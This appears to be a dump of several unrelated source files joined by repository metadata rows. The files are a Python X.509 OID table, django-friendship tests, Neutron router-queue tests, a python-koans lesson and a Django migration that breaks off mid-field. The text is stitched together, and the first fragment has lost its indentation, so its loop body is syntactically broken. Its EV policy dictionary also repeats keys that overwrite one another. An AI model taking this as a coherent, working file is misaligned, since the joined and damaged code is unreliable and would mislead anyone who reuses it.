"ca-policy-url" : "2.16.840.1.113730.1.8",
"homepage-url" : "2.16.840.1.113730.1.9",
"entity-logo" : "2.16.840.1.113730.1.10",
"user-picture" : "2.16.840.1.113730.1.11",
"ssl-server-name" : "2.16.840.1.113730.1.12",
"comment" : "2.16.840.1.113730.1.13",
"lost-password-url" : "2.16.840.1.113730.1.14",
"cert-renewal-time" : "2.16.840.1.113730.1.15",
"aia" : "2.16.840.1.113730.1.16",
"cert-scope-of-use" : "2.16.840.1.113730.1.17",
}
certPkixPe_oids = {
"authorityInfoAccess" : "1.3.6.1.5.5.7.1.1",
"biometricInfo" : "1.3.6.1.5.5.7.1.2",
"qcStatements" : "1.3.6.1.5.5.7.1.3",
"auditIdentity" : "1.3.6.1.5.5.7.1.4",
"aaControls" : "1.3.6.1.5.5.7.1.6",
"proxying" : "1.3.6.1.5.5.7.1.10",
"subjectInfoAccess" : "1.3.6.1.5.5.7.1.11"
}
certPkixQt_oids = {
"cps" : "1.3.6.1.5.5.7.2.1",
"unotice" : "1.3.6.1.5.5.7.2.2"
}
certPkixKp_oids = {
"serverAuth" : "1.3.6.1.5.5.7.3.1",
"clientAuth" : "1.3.6.1.5.5.7.3.2",
"codeSigning" : "1.3.6.1.5.5.7.3.3",
"emailProtection" : "1.3.6.1.5.5.7.3.4",
"ipsecEndSystem" : "1.3.6.1.5.5.7.3.5",
"ipsecTunnel" : "1.3.6.1.5.5.7.3.6",
"ipsecUser" : "1.3.6.1.5.5.7.3.7",
"timeStamping" : "1.3.6.1.5.5.7.3.8",
"ocspSigning" : "1.3.6.1.5.5.7.3.9",
"dvcs" : "1.3.6.1.5.5.7.3.10",
"secureShellClient" : "1.3.6.1.5.5.7.3.21",
"secureShellServer" : "1.3.6.1.5.5.7.3.22"
}
certPkixAd_oids = {
"ocsp" : "1.3.6.1.5.5.7.48.1",
"caIssuers" : "1.3.6.1.5.5.7.48.2",
"timestamping" : "1.3.6.1.5.5.7.48.3",
"id-ad-dvcs" : "1.3.6.1.5.5.7.48.4",
"id-ad-caRepository" : "1.3.6.1.5.5.7.48.5",
"id-pkix-ocsp-archive-cutoff" : "1.3.6.1.5.5.7.48.6",
"id-pkix-ocsp-service-locator" : "1.3.6.1.5.5.7.48.7",
"id-ad-cmc" : "1.3.6.1.5.5.7.48.12"
}
####### ansi-x962 #######
x962KeyType_oids = {
"prime-field" : "1.2.840.10045.1.1",
"characteristic-two-field" : "1.2.840.10045.1.2",
"ecPublicKey" : "1.2.840.10045.2.1",
}
x962Signature_oids = {
"ecdsa-with-SHA1" : "1.2.840.10045.4.1",
"ecdsa-with-Recommended" : "1.2.840.10045.4.2",
"ecdsa-with-SHA224" : "1.2.840.10045.4.3.1",
"ecdsa-with-SHA256" : "1.2.840.10045.4.3.2",
"ecdsa-with-SHA384" : "1.2.840.10045.4.3.3",
"ecdsa-with-SHA512" : "1.2.840.10045.4.3.4"
}
####### elliptic curves #######
certicomCurve_oids = {
"ansit163k1" : "1.3.132.0.1",
"ansit163r1" : "1.3.132.0.2",
"ansit239k1" : "1.3.132.0.3",
"sect113r1" : "1.3.132.0.4",
"sect113r2" : "1.3.132.0.5",
"secp112r1" : "1.3.132.0.6",
"secp112r2" : "1.3.132.0.7",
"ansip160r1" : "1.3.132.0.8",
"ansip160k1" : "1.3.132.0.9",
"ansip256k1" : "1.3.132.0.10",
"ansit163r2" : "1.3.132.0.15",
"ansit283k1" : "1.3.132.0.16",
"ansit283r1" : "1.3.132.0.17",
"sect131r1" : "1.3.132.0.22",
"ansit193r1" : "1.3.132.0.24",
"ansit193r2" : "1.3.132.0.25",
"ansit233k1" : "1.3.132.0.26",
"ansit233r1" : "1.3.132.0.27",
"secp128r1" : "1.3.132.0.28",
"secp128r2" : "1.3.132.0.29",
"ansip160r2" : "1.3.132.0.30",
"ansip192k1" : "1.3.132.0.31",
"ansip224k1" : "1.3.132.0.32",
"ansip224r1" : "1.3.132.0.33",
"ansip384r1" : "1.3.132.0.34",
"ansip521r1" : "1.3.132.0.35",
"ansit409k1" : "1.3.132.0.36",
"ansit409r1" : "1.3.132.0.37",
"ansit571k1" : "1.3.132.0.38",
"ansit571r1" : "1.3.132.0.39"
}
####### policies #######
certPolicy_oids = {
"anyPolicy" : "2.5.29.32.0"
}
# from Chromium source code (ev_root_ca_metadata.cc)
evPolicy_oids = {
"EV AC Camerfirma S.A. Chambers of Commerce Root - 2008" : "1.3.6.1.4.1.17326.10.14.2.1.2",
"EV AC Camerfirma S.A. Chambers of Commerce Root - 2008" : "1.3.6.1.4.1.17326.10.14.2.2.2",
"EV AC Camerfirma S.A. Global Chambersign Root - 2008" : "1.3.6.1.4.1.17326.10.8.12.1.2",
"EV AC Camerfirma S.A. Global Chambersign Root - 2008" : "1.3.6.1.4.1.17326.10.8.12.2.2",
"EV AddTrust/Comodo/USERTrust" : "1.3.6.1.4.1.6449.1.2.1.5.1",
"EV AddTrust External CA Root" : "1.3.6.1.4.1.782.1.2.1.8.1",
"EV Actualis Authentication Root CA" : "1.3.159.1.17.1",
"EV AffirmTrust Commercial" : "1.3.6.1.4.1.34697.2.1",
"EV AffirmTrust Networking" : "1.3.6.1.4.1.34697.2.2",
"EV AffirmTrust Premium" : "1.3.6.1.4.1.34697.2.3",
"EV AffirmTrust Premium ECC" : "1.3.6.1.4.1.34697.2.4",
"EV Autoridad de Certificacion Firmaprofesional CIF A62634068" : "1.3.6.1.4.1.13177.10.1.3.10",
"EV Baltimore CyberTrust Root" : "1.3.6.1.4.1.6334.1.100.1",
"EV Buypass Class 3" : "2.16.578.1.26.1.3.3",
"EV Certificate Authority of WoSign" : "1.3.6.1.4.1.36305.2",
"EV CertPlus Class 2 Primary CA (KEYNECTIS)" : "1.3.6.1.4.1.22234.2.5.2.3.1",
"EV Certum Trusted Network CA" : "1.2.616.1.113527.2.5.1.1",
"EV China Internet Network Information Center EV Certificates Root" : "1.3.6.1.4.1.29836.1.10",
"EV Cybertrust Global Root" : "1.3.6.1.4.1.6334.1.100.1",
"EV DigiCert High Assurance EV Root CA" : "2.16.840.1.114412.2.1",
"EV D-TRUST Root Class 3 CA 2 EV 2009" : "1.3.6.1.4.1.4788.2.202.1",
"EV Entrust Certification Authority" : "2.16.840.1.114028.10.1.2",
"EV Equifax Secure Certificate Authority (GeoTrust)" : "1.3.6.1.4.1.14370.1.6",
"EV E-Tugra Certification Authority" : "2.16.792.3.0.4.1.1.4",
"EV GeoTrust Primary Certification Authority" : "1.3.6.1.4.1.14370.1.6",
"EV GlobalSign Root CAs" : "1.3.6.1.4.1.4146.1.1",
"EV Go Daddy Certification Authority" : "2.16.840.1.114413.1.7.23.3",
"EV Izenpe.com roots Business" : "1.3.6.1.4.1.14777.6.1.1",
"EV Izenpe.com roots Government" : "1.3.6.1.4.1.14777.6.1.2",
"EV Network Solutions Certificate Authority" : "1.3.6.1.4.1.781.1.2.1.8.1",
"EV QuoVadis Roots" : "1.3.6.1.4.1.8024.0.2.100.1.2",
"EV SecureTrust Corporation Roots" : "2.16.840.1.114404.1.1.2.4.1",
"EV Security Communication RootCA1" : "1.2.392.200091.100.721.1",
"EV Staat der Nederlanden EV Root CA" : "2.16.528.1.1003.1.2.7",
"EV StartCom Certification Authority" : "1.3.6.1.4.1.23223.1.1.1",
"EV Starfield Certificate Authority" : "2.16.840.1.114414.1.7.23.3",
"EV Starfield Service Certificate Authority" : "2.16.840.1.114414.1.7.24.3",
"EV SwissSign Gold CA - G2" : "2.16.756.1.89.1.2.1.1",
"EV Swisscom Root EV CA 2" : "2.16.756.1.83.21.0",
"EV thawte CAs" : "2.16.840.1.113733.1.7.48.1",
"EV TWCA Roots" : "1.3.6.1.4.1.40869.1.1.22.3",
"EV T-Telessec GlobalRoot Class 3" : "1.3.6.1.4.1.7879.13.24.1",
"EV USERTrust Certification Authorities" : "1.3.6.1.4.1.6449.1.2.1.5.1",
"EV ValiCert Class 2 Policy Validation Authority" : "2.16.840.1.114413.1.7.23.3",
"EV VeriSign Certification Authorities" : "2.16.840.1.113733.1.7.23.6",
"EV Wells Fargo WellsSecure Public Root Certification Authority" : "2.16.840.1.114171.500.9",
"EV XRamp Global Certification Authority" : "2.16.840.1.114404.1.1.2.4.1",
"jurisdictionOfIncorporationLocalityName" : "1.3.6.1.4.1.311.60.2.1.1",
"jurisdictionOfIncorporationStateOrProvinceName" : "1.3.6.1.4.1.311.60.2.1.2",
"jurisdictionOfIncorporationCountryName" : "1.3.6.1.4.1.311.60.2.1.3"
}
x509_oids_sets = [
pkcs1_oids,
pkcs9_oids,
attributeType_oids,
certificateExtension_oids,
certExt_oids,
certPkixPe_oids,
certPkixQt_oids,
certPkixKp_oids,
certPkixAd_oids,
certPolicy_oids,
evPolicy_oids,
x962KeyType_oids,
x962Signature_oids,
certicomCurve_oids
]
x509_oids = {}
for oids_set in x509_oids_sets:
x509_oids.update(oids_set)
conf.mib = MIBDict(_name="MIB", **x509_oids)
| gpl-2.0 | 3,225,902,543,449,037,300 | 49.015817 | 110 | 0.398995 | false |
teury/django-friendship | friendship/tests/tests.py | 2 | 21163 | import os
from django.contrib.auth.models import User
from django.core.cache import cache
from django.core.exceptions import ValidationError
from django.db import IntegrityError
from django.core.urlresolvers import reverse
from django.test import TestCase
from friendship.exceptions import AlreadyExistsError
from friendship.models import Friend, Follow, FriendshipRequest
TEST_TEMPLATES = os.path.join(os.path.dirname(__file__), 'templates')
class login(object):
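    """Context manager that logs the Django test client in as the given user
    (at construction time) and logs it out again on exit."""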
def __init__(self, testcase, user, password):
self.testcase = testcase
success = testcase.client.login(username=user, password=password)
self.testcase.assertTrue(
success,
"login with username=%r, password=%r failed" % (user, password)
)
def __enter__(self):
pass
def __exit__(self, *args):
self.testcase.client.logout()
class BaseTestCase(TestCase):
def setUp(self):
"""
Setup some initial users
"""
self.user_pw = 'test'
self.user_bob = self.create_user('bob', '[email protected]', self.user_pw)
self.user_steve = self.create_user('steve', '[email protected]', self.user_pw)
self.user_susan = self.create_user('susan', '[email protected]', self.user_pw)
self.user_amy = self.create_user('amy', '[email protected]', self.user_pw)
cache.clear()
def tearDown(self):
cache.clear()
self.client.logout()
def login(self, user, password):
return login(self, user, password)
    def create_user(self, username, email_address, password):
        user = User.objects.create_user(username, email_address, password)
        return user
def assertResponse200(self, response):
self.assertEqual(response.status_code, 200)
def assertResponse302(self, response):
self.assertEqual(response.status_code, 302)
def assertResponse403(self, response):
self.assertEqual(response.status_code, 403)
def assertResponse404(self, response):
self.assertEqual(response.status_code, 404)
class FriendshipModelTests(BaseTestCase):
def test_friendship_request(self):
### Bob wants to be friends with Steve
req1 = Friend.objects.add_friend(self.user_bob, self.user_steve)
# Ensure neither have friends already
self.assertEqual(Friend.objects.friends(self.user_bob), [])
self.assertEqual(Friend.objects.friends(self.user_steve), [])
# Ensure FriendshipRequest is created
self.assertEqual(FriendshipRequest.objects.filter(from_user=self.user_bob).count(), 1)
self.assertEqual(FriendshipRequest.objects.filter(to_user=self.user_steve).count(), 1)
self.assertEqual(Friend.objects.unread_request_count(self.user_steve), 1)
# Ensure the proper sides have requests or not
self.assertEqual(len(Friend.objects.requests(self.user_bob)), 0)
self.assertEqual(len(Friend.objects.requests(self.user_steve)), 1)
self.assertEqual(len(Friend.objects.sent_requests(self.user_bob)), 1)
self.assertEqual(len(Friend.objects.sent_requests(self.user_steve)), 0)
self.assertEqual(len(Friend.objects.unread_requests(self.user_steve)), 1)
self.assertEqual(Friend.objects.unread_request_count(self.user_steve), 1)
self.assertEqual(len(Friend.objects.rejected_requests(self.user_steve)), 0)
self.assertEqual(len(Friend.objects.unrejected_requests(self.user_steve)), 1)
self.assertEqual(Friend.objects.unrejected_request_count(self.user_steve), 1)
# Ensure they aren't friends at this point
self.assertFalse(Friend.objects.are_friends(self.user_bob, self.user_steve))
# Accept the request
req1.accept()
# Ensure neither have pending requests
self.assertEqual(FriendshipRequest.objects.filter(from_user=self.user_bob).count(), 0)
self.assertEqual(FriendshipRequest.objects.filter(to_user=self.user_steve).count(), 0)
# Ensure both are in each other's friend lists
self.assertEqual(Friend.objects.friends(self.user_bob), [self.user_steve])
self.assertEqual(Friend.objects.friends(self.user_steve), [self.user_bob])
self.assertTrue(Friend.objects.are_friends(self.user_bob, self.user_steve))
# Make sure we can remove friendship
self.assertTrue(Friend.objects.remove_friend(self.user_bob, self.user_steve))
self.assertFalse(Friend.objects.are_friends(self.user_bob, self.user_steve))
self.assertFalse(Friend.objects.remove_friend(self.user_bob, self.user_steve))
# Susan wants to be friends with Amy, but cancels it
req2 = Friend.objects.add_friend(self.user_susan, self.user_amy)
self.assertEqual(Friend.objects.friends(self.user_susan), [])
self.assertEqual(Friend.objects.friends(self.user_amy), [])
req2.cancel()
self.assertEqual(Friend.objects.requests(self.user_susan), [])
self.assertEqual(Friend.objects.requests(self.user_amy), [])
# Susan wants to be friends with Amy, but Amy rejects it
req3 = Friend.objects.add_friend(self.user_susan, self.user_amy)
self.assertEqual(Friend.objects.friends(self.user_susan), [])
self.assertEqual(Friend.objects.friends(self.user_amy), [])
req3.reject()
# Duplicated requests raise a more specific subclass of IntegrityError.
with self.assertRaises(IntegrityError):
Friend.objects.add_friend(self.user_susan, self.user_amy)
with self.assertRaises(AlreadyExistsError):
Friend.objects.add_friend(self.user_susan, self.user_amy)
self.assertFalse(Friend.objects.are_friends(self.user_susan, self.user_amy))
self.assertEqual(len(Friend.objects.rejected_requests(self.user_amy)), 1)
self.assertEqual(len(Friend.objects.rejected_requests(self.user_amy)), 1)
# let's try that again..
req3.delete()
# Susan wants to be friends with Amy, and Amy reads it
req4 = Friend.objects.add_friend(self.user_susan, self.user_amy)
req4.mark_viewed()
self.assertFalse(Friend.objects.are_friends(self.user_susan, self.user_amy))
self.assertEqual(len(Friend.objects.read_requests(self.user_amy)), 1)
# Ensure we can't be friends with ourselves
with self.assertRaises(ValidationError):
Friend.objects.add_friend(self.user_bob, self.user_bob)
# Ensure we can't do it manually either
with self.assertRaises(ValidationError):
Friend.objects.create(to_user=self.user_bob, from_user=self.user_bob)
def test_multiple_friendship_requests(self):
""" Ensure multiple friendship requests are handled properly """
### Bob wants to be friends with Steve
req1 = Friend.objects.add_friend(self.user_bob, self.user_steve)
# Ensure neither have friends already
self.assertEqual(Friend.objects.friends(self.user_bob), [])
self.assertEqual(Friend.objects.friends(self.user_steve), [])
# Ensure FriendshipRequest is created
self.assertEqual(FriendshipRequest.objects.filter(from_user=self.user_bob).count(), 1)
self.assertEqual(FriendshipRequest.objects.filter(to_user=self.user_steve).count(), 1)
self.assertEqual(Friend.objects.unread_request_count(self.user_steve), 1)
# Steve also wants to be friends with Bob before Bob replies
req2 = Friend.objects.add_friend(self.user_steve, self.user_bob)
# Ensure they aren't friends at this point
self.assertFalse(Friend.objects.are_friends(self.user_bob, self.user_steve))
# Accept the request
req1.accept()
# Ensure neither have pending requests
self.assertEqual(FriendshipRequest.objects.filter(from_user=self.user_bob).count(), 0)
self.assertEqual(FriendshipRequest.objects.filter(to_user=self.user_steve).count(), 0)
self.assertEqual(FriendshipRequest.objects.filter(from_user=self.user_steve).count(), 0)
self.assertEqual(FriendshipRequest.objects.filter(to_user=self.user_bob).count(), 0)
def test_following(self):
# Bob follows Steve
req1 = Follow.objects.add_follower(self.user_bob, self.user_steve)
self.assertEqual(len(Follow.objects.followers(self.user_steve)), 1)
self.assertEqual(len(Follow.objects.following(self.user_bob)), 1)
self.assertEqual(Follow.objects.followers(self.user_steve), [self.user_bob])
self.assertEqual(Follow.objects.following(self.user_bob), [self.user_steve])
self.assertTrue(Follow.objects.follows(self.user_bob, self.user_steve))
self.assertFalse(Follow.objects.follows(self.user_steve, self.user_bob))
# Duplicated requests raise a more specific subclass of IntegrityError.
with self.assertRaises(IntegrityError):
Follow.objects.add_follower(self.user_bob, self.user_steve)
with self.assertRaises(AlreadyExistsError):
Follow.objects.add_follower(self.user_bob, self.user_steve)
# Remove the relationship
self.assertTrue(Follow.objects.remove_follower(self.user_bob, self.user_steve))
self.assertEqual(len(Follow.objects.followers(self.user_steve)), 0)
self.assertEqual(len(Follow.objects.following(self.user_bob)), 0)
self.assertFalse(Follow.objects.follows(self.user_bob, self.user_steve))
        # Ensure we cannot follow ourselves
with self.assertRaises(ValidationError):
Follow.objects.add_follower(self.user_bob, self.user_bob)
with self.assertRaises(ValidationError):
Follow.objects.create(follower=self.user_bob, followee=self.user_bob)
class FriendshipViewTests(BaseTestCase):
def setUp(self):
super(FriendshipViewTests, self).setUp()
self.friendship_request = Friend.objects.add_friend(self.user_steve, self.user_bob)
def test_friendship_view_users(self):
url = reverse('friendship_view_users')
        # the view is accessible without authentication
response = self.client.get(url)
self.assertResponse200(response)
with self.settings(FRIENDSHIP_CONTEXT_OBJECT_LIST_NAME='object_list', TEMPLATE_DIRS=(TEST_TEMPLATES,)):
response = self.client.get(url)
self.assertResponse200(response)
self.assertTrue('object_list' in response.context)
def test_friendship_view_friends(self):
url = reverse('friendship_view_friends', kwargs={'username': self.user_bob.username})
        # the view is accessible without authentication
response = self.client.get(url)
self.assertResponse200(response)
self.assertTrue('user' in response.context)
with self.settings(FRIENDSHIP_CONTEXT_OBJECT_NAME='object', TEMPLATE_DIRS=(TEST_TEMPLATES,)):
response = self.client.get(url)
self.assertResponse200(response)
self.assertTrue('object' in response.context)
def test_friendship_add_friend(self):
url = reverse('friendship_add_friend', kwargs={'to_username': self.user_amy.username})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
# if we don't POST the view should return the
# friendship_add_friend view
response = self.client.get(url)
self.assertResponse200(response)
# on POST accept the friendship request and redirect to the
# friendship_request_list view
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_request_list')
self.assertTrue(redirect_url in response['Location'])
def test_friendship_add_friend_dupe(self):
url = reverse('friendship_add_friend', kwargs={'to_username': self.user_amy.username})
with self.login(self.user_bob.username, self.user_pw):
# if we don't POST the view should return the
# friendship_add_friend view
# on POST accept the friendship request and redirect to the
# friendship_request_list view
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_request_list')
self.assertTrue(redirect_url in response['Location'])
response = self.client.post(url)
self.assertResponse200(response)
self.assertTrue('errors' in response.context)
self.assertEqual(response.context['errors'], ['Friendship already requested'])
def test_friendship_requests(self):
url = reverse('friendship_request_list')
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
response = self.client.get(url)
self.assertResponse200(response)
def test_friendship_requests_rejected(self):
url = reverse('friendship_requests_rejected')
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
response = self.client.get(url)
self.assertResponse200(response)
def test_friendship_accept(self):
url = reverse('friendship_accept', kwargs={'friendship_request_id': self.friendship_request.pk})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
# if we don't POST the view should return the
# friendship_requests_detail view
response = self.client.get(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_requests_detail', kwargs={'friendship_request_id': self.friendship_request.pk})
self.assertTrue(redirect_url in response['Location'])
# on POST accept the friendship request and redirect to the
# friendship_view_friends view
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_view_friends', kwargs={'username': self.user_bob.username})
self.assertTrue(redirect_url in response['Location'])
with self.login(self.user_steve.username, self.user_pw):
# on POST try to accept the friendship request
# but I am logged in as Steve, so I cannot accept
# a request sent to Bob
response = self.client.post(url)
self.assertResponse404(response)
def test_friendship_reject(self):
url = reverse('friendship_reject', kwargs={'friendship_request_id': self.friendship_request.pk})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
# if we don't POST the view should return the
# friendship_requests_detail view
response = self.client.get(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_requests_detail', kwargs={'friendship_request_id': self.friendship_request.pk})
self.assertTrue(redirect_url in response['Location'])
# on POST reject the friendship request and redirect to the
# friendship_requests view
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_request_list')
self.assertTrue(redirect_url in response['Location'])
with self.login(self.user_steve.username, self.user_pw):
# on POST try to reject the friendship request
# but I am logged in as Steve, so I cannot reject
# a request sent to Bob
response = self.client.post(url)
self.assertResponse404(response)
def test_friendship_cancel(self):
url = reverse('friendship_cancel', kwargs={'friendship_request_id': self.friendship_request.pk})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
# if we don't POST the view should return the
# friendship_requests_detail view
response = self.client.get(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_requests_detail', kwargs={'friendship_request_id': self.friendship_request.pk})
self.assertTrue(redirect_url in response['Location'])
# on POST try to cancel the friendship request
# but I am logged in as Bob, so I cannot cancel
# a request made by Steve
response = self.client.post(url)
self.assertResponse404(response)
with self.login(self.user_steve.username, self.user_pw):
# on POST cancel the friendship request and redirect to the
# friendship_requests view
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_request_list')
self.assertTrue(redirect_url in response['Location'])
def test_friendship_requests_detail(self):
url = reverse('friendship_requests_detail', kwargs={'friendship_request_id': self.friendship_request.pk})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
response = self.client.get(url)
self.assertResponse200(response)
def test_friendship_followers(self):
url = reverse('friendship_followers', kwargs={'username': 'bob'})
        # the view is accessible without authentication
response = self.client.get(url)
self.assertResponse200(response)
with self.settings(FRIENDSHIP_CONTEXT_OBJECT_NAME='object', TEMPLATE_DIRS=(TEST_TEMPLATES,)):
response = self.client.get(url)
self.assertResponse200(response)
self.assertTrue('object' in response.context)
def test_friendship_following(self):
url = reverse('friendship_following', kwargs={'username': 'bob'})
        # the view is accessible without authentication
response = self.client.get(url)
self.assertResponse200(response)
with self.settings(FRIENDSHIP_CONTEXT_OBJECT_NAME='object', TEMPLATE_DIRS=(TEST_TEMPLATES,)):
response = self.client.get(url)
self.assertResponse200(response)
self.assertTrue('object' in response.context)
def test_follower_add(self):
url = reverse('follower_add', kwargs={'followee_username': self.user_amy.username})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
response = self.client.get(url)
self.assertResponse200(response)
# on POST accept the friendship request and redirect to the
# friendship_following view
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_following', kwargs={'username': self.user_bob.username})
self.assertTrue(redirect_url in response['Location'])
response = self.client.post(url)
self.assertResponse200(response)
self.assertTrue('errors' in response.context)
self.assertEqual(response.context['errors'], ["User 'bob' already follows 'amy'"])
def test_follower_remove(self):
# create a follow relationship so we can test removing a follower
follow = Follow.objects.add_follower(self.user_bob, self.user_amy)
url = reverse('follower_remove', kwargs={'followee_username': self.user_amy.username})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
response = self.client.get(url)
self.assertResponse200(response)
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_following', kwargs={'username': self.user_bob.username})
self.assertTrue(redirect_url in response['Location'])
| bsd-3-clause | 7,800,063,079,491,069,000 | 43.460084 | 126 | 0.66758 | false |
blueboxgroup/neutron | neutron/tests/unit/test_router_processing_queue.py | 27 | 4074 | # Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import datetime
from neutron.agent.l3 import router_processing_queue as l3_queue
from neutron.openstack.common import uuidutils
from neutron.tests import base
_uuid = uuidutils.generate_uuid
FAKE_ID = _uuid()
FAKE_ID_2 = _uuid()
class TestExclusiveRouterProcessor(base.BaseTestCase):
def setUp(self):
super(TestExclusiveRouterProcessor, self).setUp()
def test_i_am_master(self):
master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
not_master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
master_2 = l3_queue.ExclusiveRouterProcessor(FAKE_ID_2)
not_master_2 = l3_queue.ExclusiveRouterProcessor(FAKE_ID_2)
self.assertTrue(master._i_am_master())
self.assertFalse(not_master._i_am_master())
self.assertTrue(master_2._i_am_master())
self.assertFalse(not_master_2._i_am_master())
master.__exit__(None, None, None)
master_2.__exit__(None, None, None)
def test_master(self):
master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
not_master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
master_2 = l3_queue.ExclusiveRouterProcessor(FAKE_ID_2)
not_master_2 = l3_queue.ExclusiveRouterProcessor(FAKE_ID_2)
self.assertEqual(master._master, master)
self.assertEqual(not_master._master, master)
self.assertEqual(master_2._master, master_2)
self.assertEqual(not_master_2._master, master_2)
master.__exit__(None, None, None)
master_2.__exit__(None, None, None)
def test__enter__(self):
self.assertFalse(FAKE_ID in l3_queue.ExclusiveRouterProcessor._masters)
master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
master.__enter__()
self.assertTrue(FAKE_ID in l3_queue.ExclusiveRouterProcessor._masters)
master.__exit__(None, None, None)
def test__exit__(self):
master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
not_master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
master.__enter__()
self.assertTrue(FAKE_ID in l3_queue.ExclusiveRouterProcessor._masters)
not_master.__enter__()
not_master.__exit__(None, None, None)
self.assertTrue(FAKE_ID in l3_queue.ExclusiveRouterProcessor._masters)
master.__exit__(None, None, None)
self.assertFalse(FAKE_ID in l3_queue.ExclusiveRouterProcessor._masters)
def test_data_fetched_since(self):
master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
self.assertEqual(master._get_router_data_timestamp(),
datetime.datetime.min)
ts1 = datetime.datetime.utcnow() - datetime.timedelta(seconds=10)
ts2 = datetime.datetime.utcnow()
master.fetched_and_processed(ts2)
self.assertEqual(master._get_router_data_timestamp(), ts2)
master.fetched_and_processed(ts1)
self.assertEqual(master._get_router_data_timestamp(), ts2)
master.__exit__(None, None, None)
def test_updates(self):
master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
not_master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
master.queue_update(l3_queue.RouterUpdate(FAKE_ID, 0))
not_master.queue_update(l3_queue.RouterUpdate(FAKE_ID, 0))
for update in not_master.updates():
raise Exception("Only the master should process a router")
self.assertEqual(2, len([i for i in master.updates()]))
| apache-2.0 | 1,159,734,980,378,708,200 | 38.941176 | 79 | 0.678203 | false |
maithreyee/python-koans | python2/koans/about_asserts.py | 8 | 2283 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutAsserts(Koan):
def test_assert_truth(self):
"""
We shall contemplate truth by testing reality, via asserts.
"""
# Confused? This video should help:
#
# http://bit.ly/about_asserts
self.assertTrue(True) # This should be True
def test_assert_with_message(self):
"""
Enlightenment may be more easily achieved with appropriate messages.
"""
self.assertTrue(True, "This should be True -- Please fix this")
def test_fill_in_values(self):
"""
Sometimes we will ask you to fill in the values
"""
self.assertEqual(2, 1 + 1)
def test_assert_equality(self):
"""
To understand reality, we must compare our expectations against
reality.
"""
expected_value = 2
actual_value = 1 + 1
self.assertTrue(expected_value == actual_value)
def test_a_better_way_of_asserting_equality(self):
"""
Some ways of asserting equality are better than others.
"""
expected_value = 2
actual_value = 1 + 1
self.assertEqual(expected_value, actual_value)
def test_that_unittest_asserts_work_the_same_way_as_python_asserts(self):
"""
Understand what lies within.
"""
# This throws an AssertionError exception
assert True
def test_that_sometimes_we_need_to_know_the_class_type(self):
"""
What is in a class name?
"""
# Sometimes we will ask you what the class type of an object is.
#
# For example, contemplate the text string "navel". What is its class type?
# The koans runner will include this feedback for this koan:
#
# AssertionError: '-=> FILL ME IN! <=-' != <type 'str'>
#
# So "navel".__class__ is equal to <type 'str'>? No not quite. This
# is just what it displays. The answer is simply str.
#
# See for yourself:
self.assertEqual(str, "navel".__class__) # It's str, not <type 'str'>
# Need an illustration? More reading can be found here:
#
# http://bit.ly/__class__
| mit | -2,227,563,967,843,542,800 | 27.898734 | 83 | 0.573368 | false |
uw-it-aca/mdot-rest | mdot_rest/migrations/0011_auto_20200528_1858.py | 1 | 1540 | # Generated by Django 2.1.15 on 2020-05-28 18:58
from django.db import migrations, models
import django.db.models.deletion
import mdot_rest.optimizedpngfield
class Migration(migrations.Migration):
dependencies = [
('mdot_rest', '0010_auto_20150917_2154'),
]
operations = [
migrations.AlterModelOptions(
name='intendedaudience',
options={'default_related_name': 'intended_audiences'},
),
migrations.AlterModelOptions(
name='resourcelink',
options={'default_related_name': 'resource_links'},
),
migrations.AlterField(
model_name='intendedaudience',
name='resource',
field=models.ManyToManyField(related_name='intended_audiences', to='mdot_rest.UWResource'),
),
migrations.AlterField(
model_name='resourcelink',
name='link_type',
field=models.CharField(choices=[('AND', 'Android'), ('IOS', 'iOS'), ('WEB', 'Web'), ('WIP', 'Windows Phone')], max_length=3),
),
migrations.AlterField(
model_name='resourcelink',
name='resource',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='resource_links', to='mdot_rest.UWResource'),
),
migrations.AlterField(
model_name='uwresource',
name='image',
